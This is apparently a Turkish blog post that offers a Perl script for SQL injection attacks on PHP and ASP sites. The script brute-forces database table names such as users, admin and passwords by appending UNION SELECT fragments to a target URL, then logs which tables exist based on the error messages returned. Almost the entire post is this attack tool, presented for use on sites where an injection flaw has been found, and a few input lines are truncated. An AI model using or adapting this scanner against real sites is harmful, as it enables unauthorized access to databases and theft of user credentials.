Selamun Aleykum Arkadaslar...
Son zamanların modası olan sql de size büyük bir kolaylık sağlıyacak perl exploiti vereceğim...
örneğin bir sitede sql injection hatası buldunuz tablo adını tahmin edemiyorsunuz ya da uğrasmak istemiyorsunuz bu exploit tam size göre... fazla uzatmadan kodları vereyim...
Exploiti perlde çalıstırabilirsiniz... Konu Hakkında sorusu olan konu altından belirtsin..
#!/usr/bin/perluse LWP::UserAgent;
use HTTP::Request;
print "#########################################################\n";
print "# [Terrorist Crew] #\n";
print "# Türkcelestirme By aRea~ TurkHarekatKuvvetleri #\n";
print "# Asp Ve Php Tablo scanner v1.0 #\n";
print "# www.turkharekat.com #\n";
print "# aRea #\n";
print "# Code Started... #\n";
print "#########################################################\n";
print "\n";
print "Menu:\n";
print "\n";
print "1. PHP SQL İNJ TABLO\n";
print "2. ASP SQL İNJ TABLO\n";
print "\n";
print "Opcao: ";
$opcao=
if ($opcao==1)
{
&PHP
}
if ($opcao==2)
{
&ASP
}
sub PHP
{
print "Sql Taranacak siteyi yazin:\n";
print "Ex: http://www.siteismi.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9\n\n";
chomp($site =
if($site !~ /http:\/\//) { $site = "http://$site"; }
@tab= ('+from+usuarios',
'+from+usuario',
'+from+users',
'+from+user',
'+from+login',
'+from+admin',
'+from+tbusuarios',
'+from+tbusuario',
'+from+tbusers',
'+from+tbuser',
'+from+tblogin',
'+from+tbadmin',
'+from+tblusuarios',
'+from+tblusuario',
'+from+tblusers',
'+from+tbluser',
'+from+tbllogin',
'+from+tbladmin',
'+from+tb_usuarios',
'+from+tb_usuario',
'+from+tb_users',
'+from+tb_user',
'+from+tb_login',
'+from+tb_admin',
'+from+tbl_usuarios',
'+from+tbl_usuario',
'+from+tbl_users',
'+from+tbl_user',
'+from+tbl_login',
'+from+tbl_admin',
'+from+tblUsers',
'+from+tblAdmin',
'+from+username',
'+from+usernames',
'+from+name',
'+from+names',
'+from+nombre',
'+from+nombres',
'+from+member',
'+from+members',
'+from+admin_table',
'+from+miembro',
'+from+miembros',
'+from+membername',
'+from+admins',
'+from+administrator',
'+from+administrators',
'+from+passwd',
'+from+password',
'+from+passwords',
'+from+pass',
'+from+Pass',
'+from+tAdmin',
'+from+tadmin',
'+from+user_password',
'+from+user_passwords',
'+from+user_name',
'+from+user_names',
'+from+member_password',
'+from+mods',
'+from+mod',
'+from+moderators',
'+from+moderator',
'+from+user_email',
'+from+user_emails',
'+from+user_mail',
'+from+user_mails',
'+from+mail',
'+from+emails',
'+from+email',
'+from+address',
'+from+e-mail',
'+from+emailaddress',
'+from+correo',
'+from+correos',
'+from+phpbb_users',
'+from+log',
'+from+logins',
'+from+login',
'+from+registers',
'+from+register',
'+from+usr',
'+from+usrs',
'+from+ps',
'+from+pw',
'+from+un',
'+from+u_name',
'+from+u_pass',
'+from+tpassword',
'+from+tPassword',
'+from+u_password',
'+from+nick',
'+from+nicks',
'+from+manager',
'+from+managers',
'+from+administrador',
'+from+tUser',
'+from+tUsers',
'+from+administradores',
'+from+clave',
'+from+login_id',
'+from+pwd',
'+from+pas',
'+from+sistema_id',
'+from+sistema_usuario',
'+from+sistema_password',
'+from+contrasena',
'+from+auth',
'+from+key',
'+from+senha',
'+from+tb_administrator',
'+from+tb_logon',
'+from+tb_members_tb_member',
'+from+tb_userstb_user',
'+from+tb_sys',
'+from+sys',
'+from+fazerlogon',
'+from+logon',
'+from+fazer',
'+from+uthorization',
'+from+membros',
'+from+utilizadores',
'+from+staff',
'+from+nuke_authors',
'+from+accounts',
'+from+account',
'+from+accnts',
'+from+associated',
'+from+accnt',
'+from+customers',
'+from+customer',
'+from+membres',
'+from+administrateur',
'+from+utilisateur',
'+from+tusertusers',
'+from+utilisateurs',
'+from+password',
'+from+amministratore',
'+from+god',
'+from+God',
'+from+authors',
'+from+asociado',
'+from+asociados',
'+from+autores',
'+from+membername',
'+from+autor',
'+from+autores',
'+from+Users',
'+from+Admin',
'+from+Members',
'+from+Miembros',
'+from+Usuario',
'+from+Usuarios',
'+from+ADMIN',
'+from+USERS',
'+from+USER',
'+from+MEMBER',
'+from+MEMBERS',
'+from+USUARIO',
'+from+USUARIOS',
'+from+MIEMBROS',
'+from+MIEMBRO');
print "\Tablolar araniyoooo... Bulunan tablolar asagida listelenecektir....\n\n";
foreach $scan(@tab){
my $url = $site.$scan;
my $ua = LWP::UserAgent->new();
my $req = HTTP::Request->new(GET=>$url);
my $resultado = $ua->request($req);
if ($resultado->content !~ /doesn't exist/ && $resultado->content !~ /You have an error in your SQL syntax./)
{
print "$url\n";
open(a, ">>Union_PHP.txt");
print a "$url\n";
close(a);
}}
print "\bulunan tablolar masaustune Union_PHP.txt olarak kaydedildi.\n";
print "\masaustunden ulasabilirsiniz bulunan tablolarin listelerine\n";
}
sub ASP
{
print "Sql Taranacak siteyi yazin:\n";
print "Ex: http://www.siteismi.com/default.asp?id=99\n\n";
chomp($site =
if($site !~ /http:\/\//) { $site = "http://$site"; }
@tab= ('+union+select+0+from+usuarios',
'+union+select+0+from+usuario',
'+union+select+0+from+users',
'+union+select+0+from+user',
'+union+select+0+from+login',
'+union+select+0+from+admin',
'+union+select+0+from+tbusuarios',
'+union+select+0+from+tbusuario',
'+union+select+0+from+tbusers',
'+union+select+0+from+tbuser',
'+union+select+0+from+tblogin',
'+union+select+0+from+tbadmin',
'+union+select+0+from+tblusuarios',
'+union+select+0+from+tblusuario',
'+union+select+0+from+tblusers',
'+union+select+0+from+tbluser',
'+union+select+0+from+tbllogin',
'+union+select+0+from+tbladmin',
'+union+select+0+from+tb_usuarios',
'+union+select+0+from+tb_usuario',
'+union+select+0+from+tb_users',
'+union+select+0+from+tb_user',
'+union+select+0+from+tb_login',
'+union+select+0+from+tb_admin',
'+union+select+0+from+tbl_usuarios',
'+union+select+0+from+tbl_usuario',
'+union+select+0+from+tbl_users',
'+union+select+0+from+tbl_user',
'+union+select+0+from+tbl_login',
'+union+select+0+from+tbl_admin',
'+union+select+0+from+tblUsers',
'+union+select+0+from+tblAdmin',
'+union+select+0+from+username',
'+union+select+0+from+usernames',
'+union+select+0+from+name',
'+union+select+0+from+names',
'+union+select+0+from+nombre',
'+union+select+0+from+nombres',
'+union+select+0+from+member',
'+union+select+0+from+members',
'+union+select+0+from+admin_table',
'+union+select+0+from+miembro',
'+union+select+0+from+miembros',
'+union+select+0+from+membername',
'+union+select+0+from+admins',
'+union+select+0+from+administrator',
'+union+select+0+from+administrators',
'+union+select+0+from+passwd',
'+union+select+0+from+password',
'+union+select+0+from+passwords',
'+union+select+0+from+pass',
'+union+select+0+from+Pass',
'+union+select+0+from+tAdmin',
'+union+select+0+from+tadmin',
'+union+select+0+from+user_password',
'+union+select+0+from+user_passwords',
'+union+select+0+from+user_name',
'+union+select+0+from+user_names',
'+union+select+0+from+member_password',
'+union+select+0+from+mods',
'+union+select+0+from+mod',
'+union+select+0+from+moderators',
'+union+select+0+from+moderator',
'+union+select+0+from+user_email',
'+union+select+0+from+user_emails',
'+union+select+0+from+user_mail',
'+union+select+0+from+user_mails',
'+union+select+0+from+mail',
'+union+select+0+from+emails',
'+union+select+0+from+email',
'+union+select+0+from+address',
'+union+select+0+from+e-mail',
'+union+select+0+from+emailaddress',
'+union+select+0+from+correo',
'+union+select+0+from+correos',
'+union+select+0+from+phpbb_users',
'+union+select+0+from+log',
'+union+select+0+from+logins',
'+union+select+0+from+login',
'+union+select+0+from+registers',
'+union+select+0+from+register',
'+union+select+0+from+usr',
'+union+select+0+from+usrs',
'+union+select+0+from+ps',
'+union+select+0+from+pw',
'+union+select+0+from+un',
'+union+select+0+from+u_name',
'+union+select+0+from+u_pass',
'+union+select+0+from+tpassword',
'+union+select+0+from+tPassword',
'+union+select+0+from+u_password',
'+union+select+0+from+nick',
'+union+select+0+from+nicks',
'+union+select+0+from+manager',
'+union+select+0+from+managers',
'+union+select+0+from+administrador',
'+union+select+0+from+tUser',
'+union+select+0+from+tUsers',
'+union+select+0+from+administradores',
'+union+select+0+from+clave',
'+union+select+0+from+login_id',
'+union+select+0+from+pwd',
'+union+select+0+from+pas',
'+union+select+0+from+sistema_id',
'+union+select+0+from+sistema_usuario',
'+union+select+0+from+sistema_password',
'+union+select+0+from+contrasena',
'+union+select+0+from+auth',
'+union+select+0+from+key',
'+union+select+0+from+senha',
'+union+select+0+from+tb_administrator',
'+union+select+0+from+tb_logon',
'+union+select+0+from+tb_members_tb_member',
'+union+select+0+from+tb_userstb_user',
'+union+select+0+from+tb_sys',
'+union+select+0+from+sys',
'+union+select+0+from+fazerlogon',
'+union+select+0+from+logon',
'+union+select+0+from+fazer',
'+union+select+0+from+uthorization',
'+union+select+0+from+membros',
'+union+select+0+from+utilizadores',
'+union+select+0+from+staff',
'+union+select+0+from+nuke_authors',
'+union+select+0+from+accounts',
'+union+select+0+from+account',
'+union+select+0+from+accnts',
'+union+select+0+from+associated',
'+union+select+0+from+accnt',
'+union+select+0+from+customers',
'+union+select+0+from+customer',
'+union+select+0+from+membres',
'+union+select+0+from+administrateur',
'+union+select+0+from+utilisateur',
'+union+select+0+from+tusertusers',
'+union+select+0+from+utilisateurs',
'+union+select+0+from+password',
'+union+select+0+from+amministratore',
'+union+select+0+from+god',
'+union+select+0+from+God',
'+union+select+0+from+authors',
'+union+select+0+from+asociado',
'+union+select+0+from+asociados',
'+union+select+0+from+autores',
'+union+select+0+from+membername',
'+union+select+0+from+autor',
'+union+select+0+from+autores',
'+union+select+0+from+Users',
'+union+select+0+from+Admin',
'+union+select+0+from+Members',
'+union+select+0+from+Miembros',
'+union+select+0+from+Usuario',
'+union+select+0+from+Usuarios',
'+union+select+0+from+ADMIN',
'+union+select+0+from+USERS',
'+union+select+0+from+USER',
'+union+select+0+from+MEMBER',
'+union+select+0+from+MEMBERS',
'+union+select+0+from+USUARIO',
'+union+select+0+from+USUARIOS',
'+union+select+0+from+MIEMBROS',
'+union+select+0+from+MIEMBRO');
print "\Tablolar Araniyoooo... Bulunan tablolar asagida listelenecektir....\n\n";
foreach $scan(@tab){
my $url = $site.$scan;
my $ua = LWP::UserAgent->new();
my $req = HTTP::Request->new(GET=>$url);
my $resultado = $ua->request($req);
if ($resultado->content =~ /The number of columns in the two selected tables or queries of a union query do not match./)
{
print "$url\n";
open(a, ">>Union_ASP.txt");
print a "$url\n";
close(a);
}}
print "\Bulunan tablolar masaustune Union_ASP.txt olarak kaydedildi.\n";
print "\masaustunden ulasabilirsiniz bulunan tablolarin listelerine\n";
}
Hiç yorum yok:
Yorum Gönder